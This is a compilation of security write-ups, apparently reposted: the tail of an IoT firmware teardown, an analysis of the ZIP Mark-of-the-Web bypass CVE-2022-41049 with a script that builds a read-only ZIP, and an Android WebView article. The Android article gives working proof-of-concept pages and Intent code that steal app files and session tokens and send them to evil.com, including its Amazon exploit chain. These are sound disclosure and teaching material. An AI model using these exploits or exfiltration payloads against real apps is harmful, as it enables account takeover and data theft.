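subprocess.run(["binwalk", "-e", fw], check=True)

# Unpack the squashfs root filesystem it finds (the offset-named file
# is a placeholder; check the extraction directory for the real name).
subprocess.run(["unsquashfs", "-d", "rootfs",
                f"_{fw}.extracted/root.squashfs"], check=True)

# rootfs/etc/shadow and rootfs/etc/config/ are now browsable.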

So let’s check if they have any hardcoded credentials.

Luckily, they don’t.

The last thing I observed was that, in the UBI reader, there is an extra data block at the end of the image (and somewhere in between) that could, in theory, allow us to read code.

This purchase was supposed to be hardware-hacking focused, and I failed my personal objectives. To compensate, I'll share some closing thoughts with you.

In case you were wondering "how can the vendor prevent basic IoT hardware vulnerabilities? And is it worth it?", the answer is yes, and yes. This blog is long enough, so I'll keep it short.

Think of it this way: having an extra layer of protection or some baseline obfuscation, in the event that developers make mistakes, is a good idea and something that should be planned for. The way I see it, if the JTAG, UART, or ICSP connectors weren't immediately apparent, this would've slowed me down and perhaps eventually demotivated me from pushing on.

The beautiful part is that hardware obfuscation is easy to introduce at the earliest stages of product development, unlike software controls, which are implemented at later stages of the project and often left out due to lack of time. There exist many different hardware controls, all of which are relatively easy to implement.

Since the hardware hacking portion of this blog wasn't a great success, I might as well share some thoughts & ideas on remediation and how to make IoT hardware more secure.

1. Removing the PCB silkscreen. Marks, logos, symbols, etc, have to go. There’s no real reason to draw up the entire board, especially if it’s in production.

2. Hide the traces! It's too simple to follow the solder mask (the light green parts on this PCB). What's the point of making them so obvious?

3. Hardware-level tamper protection. It’s possible to set hardware and even software fuses to prevent readout (bear in mind that both can be bypassed in many cases).

4. Remove test pins, probe pads, and other debugging connections. Realistically speaking, if the product malfunctions and a firmware update won't fix it, the manufacturer likely won't send someone onsite to debug/fix it. 99% of the time they're simply going to send you a new one. So why have debug interfaces enabled on production devices?

5. If you're using vias as test points (because they make using a multimeter or a scope probe much easier, and they are typically used by embedded passive components), it would be wise to use buried or blind vias. The cost of adding additional PCB layers is cheap if you don't already have enough to do this.

6. Remove all chipset markings! It's seriously so much harder & more time-consuming to identify a chip with no markings.

7. Why not use tamper-proof cases, sensors (photodiode detectors), or one-way screws? Again, some of these are not difficult to drill through or bypass. However, you're testing the motivation of the attacker. Only really motivated reverse engineers would bother opening devices in the dark.

If you're interested in solid publications regarding hardware obfuscation, I'd recommend the following papers:

1. https://arxiv.org/pdf/1910.00981.pdf
2. https://swarup.ece.ufl.edu/papers/J/J48.pdf

Summary:

I hope you liked the blog post. Follow me on Twitter; I sometimes post interesting stuff there too. This was a lot of fun! Personally, I'd strongly recommend going on Amazon, Alibaba, or AliExpress, buying a bunch of odd or common IoT devices, and tearing them down. You never know what you will find 🙂

Thank you for reading!

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Original text by breakdev

A Windows ZIP extraction bug (CVE-2022-41049) lets attackers craft ZIP files which evade warnings on attempts to execute packaged files, even if the ZIP file was downloaded from the Internet.

In October 2022, I came across a tweet from July 5th by @wdormann, who reported the discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

Will Dormann
@wdormann
The ISO in question here takes advantage of several default behaviors: 1) MotW doesn’t get applied to ISO contents 2) Hidden files aren’t displayed 3) .LNK file extensions are always hidden, regardless of the Explorer preference to hide known file extensions.

So if it were a ZIP instead of ISO, would MotW be fine? Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it’s really quite bad at it. Without trying too hard, here I’ve got a ZIP file where the contents retain NO protection from Mark of the Web.

https://twitter.com/wdormann/status/1544416883419619333

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day at the time: it had already been reported to Microsoft, without a fix deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process of how one found the bug, what tools were used, and what approach was taken. I wanted this post to be like that.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-Web is really another file attached as an Alternate Data Stream (ADS), named Zone.Identifier, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file file.zip from the Internet, the browser will automatically add a file.zip:Zone.Identifier ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file's execution.
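The stream is trivially accessible from code as well; a minimal sketch (Windows/NTFS only), using the same name:stream path syntax:

# Write and read the Zone.Identifier ADS the same way a browser does.
ads = r"file.zip:Zone.Identifier"

with open(ads, "w") as f:
    f.write("[ZoneTransfer]\nZoneId=3\n")

with open(ads) as f:
    print(f.read())  # the mark-of-the-web contents shown above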

This is what happens when you try to execute an executable, like a JScript file, stored in a ZIP file with MOTW attached, through double-clicking.

Clearly, the user would think twice before opening it when such a popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let’s find the cause of the bug.

Identifying the culprit

What I knew already from my observations is that the bug was triggered when the explorer.exe process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP file unpacking, and I was not mistaken.

ProcessHacker revealed the zipfldr.dll module loaded within the Explorer process, and it looked like a good starting point. I booted up IDA with the symbols conveniently provided by Microsoft, to look around.

The ExtractFromZipToFile function immediately caught my attention. I created a sample ZIP file with a packaged JScript file for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with the MOTW contents mentioned above:

notepad file.zip:Zone.Identifier

I loaded up the x64dbg debugger, attached it to explorer.exe, and set up a breakpoint on ExtractFromZipToFile. When I double-clicked the JS file, the breakpoint triggered and I could confirm I was on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are met, the CheckUnZippedFile function is called, followed by a call to _OpenExplorerTempFile, which opens the extracted file.

Having a hunch that CheckUnZippedFile is the function responsible for adding MOTW to the extracted file, I nopped its call and found that I stopped getting the MOTW warning popup when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch executing this function is skipped, I would be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that CheckUnZippedFile tries to combine the TEMP folder path with the zipped file's filename, extracted from the ZIP file, and when this combination fails, the function quits, skipping the creation of the MOTW file.

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger PathCombineW to fail, and as a result achieve my goal.

PathCombineW turned out to be a wrapper around the PathCchCombineExW function, with the output buffer size limit set to a fixed value of 260 bytes. I thought that if I managed to create a really long filename, or use some special characters which would be ignored by the function handling the file extraction but would trigger the length check in CheckUnZippedFile to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and loaded my sample ZIP file with the built-in ZIP template.

I spent a few hours testing different filename lengths and different special characters, just to see if the extraction function would behave in an erratic way. Unfortunately, I found out that there was another path length check, called prior to the one I had been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked for any controllable branching conditions that would result in not triggering the call to CheckUnZippedFile at all, but none of them seemed to depend on any of the internal ZIP file parameters. I then looked deeper into the CheckUnZippedFile function and found out that when the PathCombineW call succeeds, it creates a CAttachmentServices COM object, which has three of its methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

I realized I was about to go deep down a rabbit hole, and I might spend much longer there than a hobby project like this should require. I had to get a public exploit sample to speed things up.

Huge thanks to @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all the relevant ZIP file parameters from the obtained exploit sample into my test sample, and I confirmed that MOTW was gone when I extracted the sample JScript file.

I decided to dig deeper into the SaveWithUI COM method to find the exact place where the creation of the Zone.Identifier ADS fails. Navigating through shdocvw.dll, I ended up in urlmon.dll with a failing call to WritePrivateProfileStringW (https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-writeprivateprofilestringw).

This is the Windows API function for handling the creation of INI configuration files. Considering that the Zone.Identifier ADS file is an INI file containing the section ZoneTransfer, it was definitely relevant. I dug deeper.

The search led me to the final call of NtCreateFile (https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntcreatefile), trying to create the Zone.Identifier ADS file, which failed with an ACCESS_DENIED error when using the exploit sample, and succeeded when using the original, untampered test sample.

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I'd expect anything dynamic was in the structure of the ObjectAttributes parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from the two calls, I concluded that both the failing and succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I had not accounted for. There was no better way to figure that out than to use Process Monitor, which honestly I should've used long before I even opened IDA 😛.

Backtracking

I set up my filters to only list file operations related to files extracted to the TEMP directory, starting with the Temp prefix.

The test sample clearly succeeded in creating the Zone.Identifier ADS file:

While the exploit sample failed:

Through comparison of these two listings, I could not see any drastic differences. I exported the results as text files and compared them in a text editor. That's when I could finally spot it.

Prior to creating the Zone.Identifier ADS file, a call to SetBasicInformationFile was made with FileAttributes set to RN.

I looked up what that R attribute was (it is apparently not set for the file when extracting from the original test sample), and then…

Facepalm

The R file attribute stands for read-only. The file stored in the ZIP has the read-only attribute set, which is also set on the file extracted from the ZIP. Obviously, when Windows tries to attach the Zone.Identifier ADS to it, it fails, because the file has a read-only attribute and any write operation on it will fail with an ACCESS_DENIED error.

It doesn't even seem to be a bug, since everything is working as expected 😛. The file attributes in a ZIP file are set in the ExternalAttributes parameter of the ZIPDIRENTRY structure, and its value corresponds to the ones carried over from MS-DOS times, as stated in the ZIP file format documentation I found online.

4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of the external attributes to anything with the lowest bit set, e.g. 0x21 or 0x01, would effectively make the file read-only, with Windows being unable to create MOTW for it after extraction.
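Reproducing this with Python's zipfile module takes only a few lines; the member name and payload below are illustrative:

import zipfile

zi = zipfile.ZipInfo("click_me.js")
zi.external_attr = 0x01  # MS-DOS read-only bit in the low byte

with zipfile.ZipFile("motw_test.zip", "w") as zf:
    zf.writestr(zi, 'WScript.Echo("YOU GOT HACKED!!1");')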

Conclusion

I honestly expected the bug to be much more complicated, and I definitely shot myself in the foot by getting too excited to start up IDA instead of running Process Monitor first. I started with IDA first as I didn't have an exploit sample in the beginning, and I was hoping to find the bug through code analysis. Bottom line: I managed to learn something new about Windows internals and how the extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

https://twitter.com/mrgretzky/status/1587234508998418434

The patch was clean and reliable as seen in the screenshot from a debugger:

I was also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story of how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO.  So how did I make the ZIP?  I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it.  The ZIP contents behaved the same as the ISO.

Every mounted ISO image lists all files in read-only mode. Dragging & dropping files from a read-only partition to a different one preserves the read-only attribute on the created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that the 7-Zip extractor, even though it announced it would begin adding MOTW to every file extracted from a MOTW-marked archive, does not add MOTW by default; this feature has to be enabled manually.

I mention this as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and even be ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took for granted that it would be enabled by default, but apparently the developer doesn’t know exactly what he is doing.

I haven’t yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Android: Exploring vulnerabilities in WebResourceResponse

Android: Exploring vulnerabilities in WebResourceResponse

Original text by oversecured

When it comes to vulnerabilities in WebViews, we often overlook the incorrect implementation of WebResourceResponse, a WebView class that allows an Android app to emulate the server by returning a response (including a status code, content type, content encoding, headers, and the response body) from the app's code itself, without making any actual requests to the server. At the end of the article, we'll show how we exploited a vulnerability related to this in Amazon apps.

Do you want to check your mobile apps for such types of vulnerabilities? Oversecured mobile apps scanner provides an automatic solution that helps to detect vulnerabilities in Android and iOS mobile apps. You can integrate Oversecured into your development process and check every new line of your code to ensure your users are always protected.

Start securing your apps by starting a free 2-week trial from Quick Start, or you can book a call with our team or contact us to explore more.

What is WebResourceResponse?

The WebView class in Android is used for displaying web content within an app and provides extensive capabilities for manipulating requests and responses. It is a fancy web browser that allows developers, among other things, to bypass standard browser security. Any misuse of these features by a malicious actor can lead to vulnerabilities in mobile apps.

One of these features is that a WebView allows you to intercept app requests and return arbitrary content, which is implemented via the WebResourceResponse class.

Let's look at a typical example of a WebResourceResponse implementation:

WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
   public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
       Uri uri = request.getUrl();
       if (uri.getPath().startsWith("/local_cache/")) {
           File cacheFile = new File(getCacheDir(), uri.getLastPathSegment());
           if (cacheFile.exists()) {
               InputStream inputStream;
               try {
                   inputStream = new FileInputStream(cacheFile);
               } catch (IOException e) {
                   return null;
               }
               Map<String, String> headers = new HashMap<>();
               headers.put("Access-Control-Allow-Origin", "*");
               return new WebResourceResponse("text/html", "utf-8", 200, "OK", headers, inputStream);
           }
       }
       return super.shouldInterceptRequest(view, request);
   }
});

As you can see in the code above, if the request URI matches a given pattern, then the response is returned from the app resources or local files. The problem arises when an attacker can manipulate the path of the returned file and, through XHR requests, gain access to arbitrary files.

Therefore, if an attacker discovers a simple XSS or the ability to open arbitrary links inside the Android app, they can use that to leak sensitive user data – which can also include the access token, leading to a full account takeover.

Proof of Concept for an attack

If you already have the ability to execute arbitrary JavaScript code inside a vulnerable WebView, and assuming there is some sensitive data in /data/data/com.victim/shared_prefs/auth.xml, then the Proof of Concept for the attack will look like this:

<!DOCTYPE html>
<html>
<head>
   <title>Evil page</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

      // The decoded path still begins with /local_cache/, so the app's check passes,
      // but getLastPathSegment() decodes ..%2F to ../ and escapes the cache directory
      oReq.open("GET", "https://any.domain/local_cache/..%2F" + encodeURIComponent(path), true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile("shared_prefs/auth.xml", function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

It should be noted that the attack works because new File(getCacheDir(), uri.getLastPathSegment()) is used to generate the path, and the method Uri.getLastPathSegment() returns a decoded value. Uri splits the path into segments before decoding them, so the encoded ..%2F stays inside the last segment and is only decoded afterwards, turning it into ../.
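
Here is a minimal sketch of this behavior, using the hypothetical any.domain URL from the PoC above:

Uri uri = Uri.parse("https://any.domain/local_cache/..%2Fshared_prefs%2Fauth.xml");

// The decoded path still begins with the expected prefix, so the startsWith() check passes
uri.getPath();            // "/local_cache/../shared_prefs/auth.xml"

// Segments are split before decoding, so the whole encoded tail is one segment
uri.getLastPathSegment(); // "../shared_prefs/auth.xml"

// new File(getCacheDir(), "../shared_prefs/auth.xml") then resolves outside the cache directory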

However, policies like CORS still apply inside a WebView. If Access-Control-Allow-Origin: * is not specified in the headers, requests to origins other than the page's own will not be allowed. In our example, this restriction does not affect the exploitation of the path traversal, because any.domain can simply be replaced with the current scheme + host + port, that is, the origin of the page running the injected JavaScript.

An overview of the vulnerability in Amazon’s apps

We scanned the Amazon Shopping and Amazon India Online Shopping apps and found two vulnerabilities, which we chained to gain access to arbitrary files owned by the Amazon apps. We reported them to the Amazon VRP on December 21st, 2019, and Amazon confirmed the fixes on April 6th, 2020.

  • The first was opening arbitrary URLs within the WebView through the com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity activity.
  • The second was stealing arbitrary files via WebResourceResponse in the com/amazon/mobile/mash/MASHWebViewClient.java file.

Two checks take place in the com/amazon/mobile/mash/handlers/LocalAssetHandler.java file.

One is in the shouldHandlePackage method:

public boolean shouldHandlePackage(UrlWebviewPackage pkg) {
    return pkg.getUrl().startsWith("https://app.local/");
}

And the second is in the handlePackage handler:

public WebResourceResponse handlePackage(UrlWebviewPackage pkg) {
    InputStream stm;
    Uri uri = Uri.parse(pkg.getUrl());
    String path = uri.getPath().substring(1);
    try {
        if (path.startsWith("assets/")) {
            stm = pkg.getWebView().getContext().getResources().getAssets().open(path.substring("assets/".length()));
        } else if (path.startsWith("files/")) {
            // path to an arbitrary file: a URL like https://app.local/files//data/data/...
            // yields the absolute path /data/data/... with no validation
            stm = new FileInputStream(path.substring("files/".length()));
        } else {
            MASHLog.m2345v(TAG, "Unexpected path " + path);
            stm = null;
        }
        //...
        Map<String, String> headers = new HashMap<>();
        headers.put("Cache-Control", "max-age=31556926");
        headers.put("Access-Control-Allow-Origin", "*");
        return new WebResourceResponse(mimeType, null, 200, "OK", headers, stm);
    } catch (IOException e) {
        MASHLog.m2346v(TAG, "Failed to load resource " + uri, e);
        return null;
    }
}


Proof of Concept for Amazon

Keeping the above-mentioned vulnerabilities and checks in mind, the attacker’s app looked like this:

// Copy the exploit page from the attacker app's assets to a world-readable location
String file = "/sdcard/evil.html";
try {
    InputStream i = getAssets().open("evil.html");
    OutputStream o = new FileOutputStream(file);
    IOUtils.copy(i, o);
    i.close();
    o.close();
} catch (Exception e) {
    throw new RuntimeException(e);
}

// Launch the exported activity; the file:// URL's authority is www.amazon.in, and the
// target file path is smuggled in the fragment for evil.html to read
Intent intent = new Intent();
intent.setClassName("in.amazon.mShop.android.shopping", "com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity");
intent.putExtra("MASHWEBVIEW_URL", "file://www.amazon.in" + file + "#/data/data/in.amazon.mShop.android.shopping/shared_prefs/DataStore.xml");
startActivity(intent);

The apps also had a host check, which we bypassed: note that the file:// URL above carries www.amazon.in as its authority. The check could also be bypassed using the javascript: scheme, which removes any need for SD card permissions to create a file, as sketched below.
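
A hypothetical sketch of that variant (the exact payload Amazon's check accepted is an assumption; the extra name follows the example above): a JavaScript engine treats //www.amazon.in/ as a line comment, so a javascript: URL can present a plausible authority to a naive host check while a percent-encoded newline (%0A) turns everything after it into executable code.

// Hypothetical variant: no file on the SD card is needed, the payload rides in the URL itself
Intent intent = new Intent();
intent.setClassName("in.amazon.mShop.android.shopping",
        "com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity");
// "//www.amazon.in/" parses as the URL's authority but executes as a JS comment;
// the encoded newline starts the actual script
intent.putExtra("MASHWEBVIEW_URL",
        "javascript://www.amazon.in/%0Alocation.href='https://evil.com/?data='+document.cookie");
startActivity(intent);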

The file evil.html contained the exploit code:

<!DOCTYPE html>
<html>
<head>
   <title>Evil</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://app.local/files/" + path, true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

    // The target file path arrives in the URL fragment set by the attacker's Intent
    theftFile(location.hash.substring(1), function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

As a result, on opening the attacker's app, the DataStore.xml file containing the user's session token was sent to the attacker's server.

How to prevent this vulnerability

While implementing WebResourceResponse, it is recommended to use WebViewAssetLoader, a user-friendly interface that allows the app to safely serve data from resources, assets, or a predefined directory.
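
A minimal sketch of that approach using the androidx.webkit library (the /assets/ and /res/ paths and the appassets.androidplatform.net domain are the library's defaults):

WebViewAssetLoader assetLoader = new WebViewAssetLoader.Builder()
        // Serves only from the app's assets/ and res/ directories; the handlers
        // validate paths, so "../" sequences cannot escape them
        .addPathHandler("/assets/", new WebViewAssetLoader.AssetsPathHandler(this))
        .addPathHandler("/res/", new WebViewAssetLoader.ResourcesPathHandler(this))
        .build();

WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
    @Override
    public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
        return assetLoader.shouldInterceptRequest(request.getUrl());
    }
});

// Pages are then loaded from the loader's virtual domain instead of file:// URLs
webView.loadUrl("https://appassets.androidplatform.net/assets/index.html");

Unlike a hand-rolled shouldInterceptRequest, the loader never touches the file system outside the directories it was configured with.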

It can be challenging to keep track of security, especially in large projects. You can use the Oversecured vulnerability scanner, which tracks all known security issues on Android and iOS, including all the vectors mentioned above. To begin testing your apps, use Quick Start, book a call, or contact us.